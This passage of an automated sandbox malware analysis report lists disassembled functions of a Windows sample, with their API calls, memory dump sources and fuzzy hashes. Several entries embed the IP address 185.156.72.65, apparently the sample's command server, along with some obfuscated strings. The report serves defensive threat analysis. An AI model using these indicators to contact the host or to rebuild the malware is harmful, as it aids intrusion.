                        Function 04941482 Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.4515886279.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4930000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: daefbb992f6e98e82da9deec0440fc20cde4ea8490cf1120197b10a32be04fa6
                        • Instruction ID: fec3291de11257372792f846d95a96de2c0d2dee6963ecde032b99d5e1ff827b
                        • Opcode Fuzzy Hash: daefbb992f6e98e82da9deec0440fc20cde4ea8490cf1120197b10a32be04fa6
                        • Instruction Fuzzy Hash: BE21C071300205AFEB20AF71DC99DBB77AEBFC4268B014935E91A9B150E730FC8087A0
                        Function 00418485 Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                        Download Yara Rule
                        APIs
                        • GetEnvironmentStringsW.KERNEL32 ref: 0041848D
                          • Part of subcall function 00414F98: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,004151FB,?,00000000,-00000008), ref: 00414FF9
                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 004184C5
                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 004184E5
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514119165.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                        • String ID:
                        • API String ID: 158306478-0
                        • Opcode ID: f25717e6bd25f80c70edce058ac37b14eb42a5c51d25e47d03568e648881f521
                        • Instruction ID: 3124dd8456e489f230558b3eb58c4822848d10064887246f2ffea9b448aa8e9c
                        • Opcode Fuzzy Hash: f25717e6bd25f80c70edce058ac37b14eb42a5c51d25e47d03568e648881f521
                        • Instruction Fuzzy Hash: 6311C8B6511515BEA7112BB69C8ACEF7A5EDF89398711002EF50191201FE7CDF82417E
                        Function 049435E0 Relevance: 6.1, APIs: 4, Instructions: 74COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • FreeLibrary.KERNEL32(00000000,?,049436EF,0493381E,?,00000000,04932AA0,04932AA2,?,04943868,00000022,00420B0C,00422950,00422958,04932AA0), ref: 049436A1
                        Memory Dump Source
                        • Source File: 00000000.00000002.4515886279.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4930000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: FreeLibrary
                        • String ID:
                        • API String ID: 3664257935-0
                        • Opcode ID: b8c7e483e8ea991eea5b44eb111e182d5bd336103010429673e37ca0c8998616
                        • Instruction ID: 7ac8437ba04f97455e492d6823a9f0f309c983f6a5be6409435b5a02741009d8
                        • Opcode Fuzzy Hash: b8c7e483e8ea991eea5b44eb111e182d5bd336103010429673e37ca0c8998616
                        • Instruction Fuzzy Hash: BE210231B02612BBC731AF74EC46E5A3B6C9B823A0B114234ED06A73A1EB30FD05C6D4
                        Function 049486EC Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                        Download Yara Rule
                        APIs
                        • GetEnvironmentStringsW.KERNEL32 ref: 049486F4
                          • Part of subcall function 049451FF: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,04945462,?,00000000,-00000008), ref: 04945260
                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0494872C
                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0494874C
                        Memory Dump Source
                        • Source File: 00000000.00000002.4515886279.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4930000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                        • String ID:
                        • API String ID: 158306478-0
                        • Opcode ID: f25717e6bd25f80c70edce058ac37b14eb42a5c51d25e47d03568e648881f521
                        • Instruction ID: 5d5482b3d7dac2a74fe145a59ae765e5de88a1c0242790c3429a2bb693b327b7
                        • Opcode Fuzzy Hash: f25717e6bd25f80c70edce058ac37b14eb42a5c51d25e47d03568e648881f521
                        • Instruction Fuzzy Hash: FB11C0BA6016197F77217BB6DCD8CAF3DADCEC91A83010934F906A1100FA60FE0282B5
                        Function 0041CC28 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,00000000,?,0041C89F,00000000,00000001,?,00000000,?,00419ABE,00000000,00000000,00000000), ref: 0041CC3F
                        • GetLastError.KERNEL32(?,0041C89F,00000000,00000001,?,00000000,?,00419ABE,00000000,00000000,00000000,00000000,00000000,?,0041A061,?), ref: 0041CC4B
                          • Part of subcall function 0041CC11: CloseHandle.KERNEL32(FFFFFFFE,0041CC5B,?,0041C89F,00000000,00000001,?,00000000,?,00419ABE,00000000,00000000,00000000,00000000,00000000), ref: 0041CC21
                        • ___initconout.LIBCMT ref: 0041CC5B
                          • Part of subcall function 0041CBD3: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0041CC02,0041C88C,00000000,?,00419ABE,00000000,00000000,00000000,00000000), ref: 0041CBE6
                        • WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,?,0041C89F,00000000,00000001,?,00000000,?,00419ABE,00000000,00000000,00000000,00000000), ref: 0041CC70
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514119165.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                        • String ID:
                        • API String ID: 2744216297-0
                        • Opcode ID: e3757025193b1f655bc0a77c3c1a7d52d6e2513ac00293883d9defc3f3400d05
                        • Instruction ID: 7cbbc293f9202e5c3ba5059a923030a343761d0fd9452bc47cab7a7a002841ff
                        • Opcode Fuzzy Hash: e3757025193b1f655bc0a77c3c1a7d52d6e2513ac00293883d9defc3f3400d05
                        • Instruction Fuzzy Hash: 34F03036580218BBCF221FD5EC45ADE3F26FF497A0B404031FA0D96131D6328C619BD8
                        Function 0494CE8F Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,00000000,?,0494CB06,00000000,00000001,?,00000000,?,04949D25,00000000,00000000,00000000), ref: 0494CEA6
                        • GetLastError.KERNEL32(?,0494CB06,00000000,00000001,?,00000000,?,04949D25,00000000,00000000,00000000,00000000,00000000,?,0494A2C8,?), ref: 0494CEB2
                          • Part of subcall function 0494CE78: CloseHandle.KERNEL32(0042CA30,0494CEC2,?,0494CB06,00000000,00000001,?,00000000,?,04949D25,00000000,00000000,00000000,00000000,00000000), ref: 0494CE88
                        • ___initconout.LIBCMT ref: 0494CEC2
                          • Part of subcall function 0494CE3A: CreateFileW.KERNEL32(00428728,40000000,00000003,00000000,00000003,00000000,00000000,0494CE69,0494CAF3,00000000,?,04949D25,00000000,00000000,00000000,00000000), ref: 0494CE4D
                        • WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,?,0494CB06,00000000,00000001,?,00000000,?,04949D25,00000000,00000000,00000000,00000000), ref: 0494CED7
                        Memory Dump Source
                        • Source File: 00000000.00000002.4515886279.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4930000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                        • String ID:
                        • API String ID: 2744216297-0
                        • Opcode ID: e3757025193b1f655bc0a77c3c1a7d52d6e2513ac00293883d9defc3f3400d05
                        • Instruction ID: 0e4df125af275dcc813ada621727d7d5e240c2bdd18a86ce420195b90332a194
                        • Opcode Fuzzy Hash: e3757025193b1f655bc0a77c3c1a7d52d6e2513ac00293883d9defc3f3400d05
                        • Instruction Fuzzy Hash: 6BF01C36551119BFCF225F95EC08E8A3F26FF886A1B428030FA1996130D7329D219BD4
                        Function 00409D4D Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                        Download Yara Rule
                        APIs
                        • SleepConditionVariableCS.KERNELBASE(?,00409CEA,00000064), ref: 00409D70
                        • LeaveCriticalSection.KERNEL32(0042D064,0040104A,?,00409CEA,00000064,?,?,?,0040104A,0042DBF4), ref: 00409D7A
                        • WaitForSingleObjectEx.KERNEL32(0040104A,00000000,?,00409CEA,00000064,?,?,?,0040104A,0042DBF4), ref: 00409D8B
                        • EnterCriticalSection.KERNEL32(0042D064,?,00409CEA,00000064,?,?,?,0040104A,0042DBF4), ref: 00409D92
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514119165.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
                        • String ID:
                        • API String ID: 3269011525-0
                        • Opcode ID: 203c7f3a807ec8057ea0aa5072313220b9e23051332dfe18f360eb7747514d6b
                        • Instruction ID: ff8beb748e1eb1f5c5e1e2cf8612c53580035ff8934018e5237f3a6b450dea6c
                        • Opcode Fuzzy Hash: 203c7f3a807ec8057ea0aa5072313220b9e23051332dfe18f360eb7747514d6b
                        • Instruction Fuzzy Hash: 99E0ED31A85624FBCB111B60FC09AD97F25AF09B59F508032F90576171C7755D039BDD
                        Function 00410F1D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMON
                        Download Yara Rule
                        APIs
                        • __startOneArgErrorHandling.LIBCMT ref: 00410FAD
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514119165.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ErrorHandling__start
                        • String ID: pow
                        • API String ID: 3213639722-2276729525
                        • Opcode ID: 31403c08627a7049c2df153d0248aecbd7cedb7773a1804d7f4783afb4547b5b
                        • Instruction ID: 84ba177bd0b46390de2483f8fdd39171a32ac8a21a9604072373650434c829d0
                        • Opcode Fuzzy Hash: 31403c08627a7049c2df153d0248aecbd7cedb7773a1804d7f4783afb4547b5b
                        • Instruction Fuzzy Hash: 96515B71A0820196CB217B14DA023EB6BA0DB40751F618E6FF095453E8DBBDCCD7DA4E
                        Function 004095D0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 183COMMON
                        Download Yara Rule
                        APIs
                        • Concurrency::cancel_current_task.LIBCPMT ref: 0040970E
                        • std::_Xinvalid_argument.LIBCPMT ref: 00409725
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514119165.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Concurrency::cancel_current_taskXinvalid_argumentstd::_
                        • String ID: vector too long
                        • API String ID: 3646673767-2873823879
                        • Opcode ID: fa5d083a05728e905f1c3c49002d69253fe8fe1330e477015a8c99b2aef7f032
                        • Instruction ID: 3420b24d6a7003b5252f74598cccc6f366c2f3b22bc1f833b28caab4f548f479
                        • Opcode Fuzzy Hash: fa5d083a05728e905f1c3c49002d69253fe8fe1330e477015a8c99b2aef7f032
                        • Instruction Fuzzy Hash: B05104B2E002159BCB14DF6CD8406AEB7A5EF84314F14067EE805FB382EB75AE408BD5
                        Function 049320B7 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 154COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4515886279.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4930000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: http://
                        • API String ID: 0-1121587658
                        • Opcode ID: 31913df3476a4e36ea7eb6e4b830b689be3485bdda04cc83fff487d743600f56
                        • Instruction ID: 32d8b7f3cbde112e296c6b2f801fbe9873100f44421498406fbb040862ae1e58
                        • Opcode Fuzzy Hash: 31913df3476a4e36ea7eb6e4b830b689be3485bdda04cc83fff487d743600f56
                        • Instruction Fuzzy Hash: 61518071E002099FEB14CFE8C894BEEF7B9EF49304F50862DE915A7680D775A945CBA0
                        Function 0493BA67 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 120COMMON
                        Download Yara Rule
                        APIs
                        • ___except_validate_context_record.LIBVCRUNTIME ref: 0493BAA6
                        • __IsNonwritableInCurrentImage.LIBCMT ref: 0493BB5A
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4515886279.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4930000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CurrentImageNonwritable___except_validate_context_record
                        • String ID: csm
                        • API String ID: 3480331319-1018135373
                        • Opcode ID: 2a817a1480194b9b32cfb7907dea545d9bb946fea234306998335fac64bc32e7
                        • Instruction ID: 694796231662bcf95a898fde0e2e701fb26c0bc2e67624f3b2fd4797a47625a1
                        • Opcode Fuzzy Hash: 2a817a1480194b9b32cfb7907dea545d9bb946fea234306998335fac64bc32e7
                        • Instruction Fuzzy Hash: 7141A734A002199FDF10DF69C884A9EBBF5AF46319F1481B5E814AB356DB31BA01CB90
                        Function 0040C0A0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 0040C0C5
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514119165.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: EncodePointer
                        • String ID: MOC$RCC
                        • API String ID: 2118026453-2084237596
                        • Opcode ID: dec2c1a8c1fc86745a31a1a2a9fa5c906894c1295ee00ff621ec7b5f648f62df
                        • Instruction ID: 8859d5309be3b2406ffac81c3508a23779d2d647c67c70ddfd5e45ce13346e89
                        • Opcode Fuzzy Hash: dec2c1a8c1fc86745a31a1a2a9fa5c906894c1295ee00ff621ec7b5f648f62df
                        • Instruction Fuzzy Hash: 89415A72900209EFCF15DF94CD81AAEBBB5BF48304F18816AF905BA292D3399951DF58
                        Function 0493C307 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • RtlEncodePointer.NTDLL(00000000), ref: 0493C32C
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4515886279.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4930000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: EncodePointer
                        • String ID: MOC$RCC
                        • API String ID: 2118026453-2084237596
                        • Opcode ID: dec2c1a8c1fc86745a31a1a2a9fa5c906894c1295ee00ff621ec7b5f648f62df
                        • Instruction ID: 5e281834ea727d7016924bae745ad42a79e2cfbe063a5ee614a20abbce183676
                        • Opcode Fuzzy Hash: dec2c1a8c1fc86745a31a1a2a9fa5c906894c1295ee00ff621ec7b5f648f62df
                        • Instruction Fuzzy Hash: 88414872900609AFDF26CF98CD84AEEBBB9BF4A305F148069F914B7215D335A960DF50
                        Function 00401000 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                          • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                        • __Init_thread_footer.LIBCMT ref: 00401084
                          • Part of subcall function 00409C7B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409C85
                          • Part of subcall function 00409C7B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409CB8
                          • Part of subcall function 00409C7B: RtlWakeAllConditionVariable.NTDLL ref: 00409D2F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514119165.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                        • String ID: 185.156.72.65$185.156.72.65
                        • API String ID: 2296764815-2656946096
                        • Opcode ID: 5c5045922954c3457701567e6a6c9e3e1ad7be9ff9027362e03c1bac20b5626a
                        • Instruction ID: 35b52d446d861aa170816ff75a143a42135cfe1fbea8b7bbecd3f4fad1973d83
                        • Opcode Fuzzy Hash: 5c5045922954c3457701567e6a6c9e3e1ad7be9ff9027362e03c1bac20b5626a
                        • Instruction Fuzzy Hash: E32137B0F002859EDB14EFA4D9557A97BB0EB01308F90017EE4457B3A2D7B85985CB5D
                        Function 00401110 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                          • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                        • __Init_thread_footer.LIBCMT ref: 00401194
                          • Part of subcall function 00409C7B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409C85
                          • Part of subcall function 00409C7B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409CB8
                          • Part of subcall function 00409C7B: RtlWakeAllConditionVariable.NTDLL ref: 00409D2F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514119165.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                        • String ID: 185.156.72.65$185.156.72.65
                        • API String ID: 2296764815-2656946096
                        • Opcode ID: d4edda98fe8d358c67ce7c8865cf0bbf8e120b8e7e0123c9594653d9c3c5ac19
                        • Instruction ID: 080c8299786e9307901dd30be4a7bf730519a23c54167f024b5206933e891779
                        • Opcode Fuzzy Hash: d4edda98fe8d358c67ce7c8865cf0bbf8e120b8e7e0123c9594653d9c3c5ac19
                        • Instruction Fuzzy Hash: 5E217CB0F002409ACB24EFA4E8257A97BB0FF04308F50027EE5056B3D2D7B82945CB5D
                        Function 00401220 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                          • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                        • __Init_thread_footer.LIBCMT ref: 004012A4
                          • Part of subcall function 00409C7B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409C85
                          • Part of subcall function 00409C7B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409CB8
                          • Part of subcall function 00409C7B: RtlWakeAllConditionVariable.NTDLL ref: 00409D2F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514119165.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                        • String ID: 185.156.72.65$185.156.72.65
                        • API String ID: 2296764815-2656946096
                        • Opcode ID: 03769d53c3af616b68b676de3282a5896e4960c6caaa03750b9c6d119f5d353c
                        • Instruction ID: f3bdde1b4a8bc64e2f46b2d629ea0fd90e9d23492dc14d44f4e24dc008f4330a
                        • Opcode Fuzzy Hash: 03769d53c3af616b68b676de3282a5896e4960c6caaa03750b9c6d119f5d353c
                        • Instruction Fuzzy Hash: BA212274F002459ADB14FFA8E8157A97BB0BB00308F9041BED512BB2E2D7786901CB5D
                        Function 04931487 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 04939F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04939F37
                          • Part of subcall function 04939F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04939F74
                        • __Init_thread_footer.LIBCMT ref: 0493150B
                          • Part of subcall function 04939EE2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04939EEC
                          • Part of subcall function 04939EE2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04939F1F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4515886279.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4930000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CriticalSection$EnterLeave$Init_thread_footer
                        • String ID: 185.156.72.65$185.156.72.65
                        • API String ID: 4132704954-2656946096
                        • Opcode ID: be6c719825c284f158df54f744c121145a8f163f6f071af473cd966bd4c0dd79
                        • Instruction ID: cbc1c44b0f60fb8cbab4a4e558dc6998c46e476aea1e1b73f5a39ff0a6ffc014
                        • Opcode Fuzzy Hash: be6c719825c284f158df54f744c121145a8f163f6f071af473cd966bd4c0dd79
                        • Instruction Fuzzy Hash: 642123B4F002049EEB24EFB8E8157A87BB0FF06309F9041B9C4239B2A0D7B57506CB59
                        Function 04931267 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 04939F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04939F37
                          • Part of subcall function 04939F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04939F74
                        • __Init_thread_footer.LIBCMT ref: 049312EB
                          • Part of subcall function 04939EE2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04939EEC
                          • Part of subcall function 04939EE2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04939F1F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4515886279.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4930000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CriticalSection$EnterLeave$Init_thread_footer
                        • String ID: 185.156.72.65$185.156.72.65
                        • API String ID: 4132704954-2656946096
                        • Opcode ID: 7e78777c7f8c15a49dcdc04fede0bd4176c739fbcff90974db9594e6dc6bcbe4
                        • Instruction ID: 865ca5aa8a248bc6b74939961860465a519fccb2b6aa4b8884351a05414ca6aa
                        • Opcode Fuzzy Hash: 7e78777c7f8c15a49dcdc04fede0bd4176c739fbcff90974db9594e6dc6bcbe4
                        • Instruction Fuzzy Hash: CF2168B0F002459EDB24EFA8E915BA87BB0FB03308F9001B9E44567360D7B56589CB5E
                        Function 04931377 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 04939F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04939F37
                          • Part of subcall function 04939F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04939F74
                        • __Init_thread_footer.LIBCMT ref: 049313FB
                          • Part of subcall function 04939EE2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04939EEC
                          • Part of subcall function 04939EE2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04939F1F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4515886279.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4930000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CriticalSection$EnterLeave$Init_thread_footer
                        • String ID: 185.156.72.65$185.156.72.65
                        • API String ID: 4132704954-2656946096
                        • Opcode ID: 8a8fe8d317b662227fd327a90130799ce29107c4e0518a32c3058f42c24412ec
                        • Instruction ID: e2f21ba7126203f821764bbd883ab4178ca3c09989b649307fd135a838fc94bd
                        • Opcode Fuzzy Hash: 8a8fe8d317b662227fd327a90130799ce29107c4e0518a32c3058f42c24412ec
                        • Instruction Fuzzy Hash: F4213BB4F002449EDB24EFA4E9297A8BBB0FF42309F9001B9D845573A0D7B57546CB5D
                        Function 00408480 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                          • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                        • __Init_thread_footer.LIBCMT ref: 004084EE
                          • Part of subcall function 00409C7B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409C85
                          • Part of subcall function 00409C7B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409CB8
                          • Part of subcall function 00409C7B: RtlWakeAllConditionVariable.NTDLL ref: 00409D2F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514119165.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                        • String ID: G@ZK$[@G_
                        • API String ID: 2296764815-2338778587
                        • Opcode ID: 83c89cb96f0188348aa664fe5a3b9a2307e547b5dfc0b364f734f744eaf6d0b1
                        • Instruction ID: 2d9fbaa08c13fc83b2f5e0005e6d1fa5ae776f13101647786266d8808d8cc77d
                        • Opcode Fuzzy Hash: 83c89cb96f0188348aa664fe5a3b9a2307e547b5dfc0b364f734f744eaf6d0b1
                        • Instruction Fuzzy Hash: F501DB70F00285DFC710EBB9AD41969B7A0A719310BA1417EE526BB3D2EA79AC01CB4D
                        Function 00407E80 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                          • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                        • __Init_thread_footer.LIBCMT ref: 00407EEE
                          • Part of subcall function 00409C7B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409C85
                          • Part of subcall function 00409C7B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409CB8
                          • Part of subcall function 00409C7B: RtlWakeAllConditionVariable.NTDLL ref: 00409D2F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514119165.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                        • String ID: G@ZK$[@G_
                        • API String ID: 2296764815-2338778587
                        • Opcode ID: 9d937272391ced5062343f2fa694021c1e821d7a0b24c59750c86be7e58ed2ae
                        • Instruction ID: 86c78c31387f24dba649c5f85d45a7e4d1f1fe09f4149f0eb9c238fce71b3fdb
                        • Opcode Fuzzy Hash: 9d937272391ced5062343f2fa694021c1e821d7a0b24c59750c86be7e58ed2ae
                        • Instruction Fuzzy Hash: D601D6F0F05244DBD720DBA9AC41A6AB7B0AB09304F9005BAF51977792DA396C41CB49
                        Function 049386E7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMON
                        Download Yara Rule
                        APIs
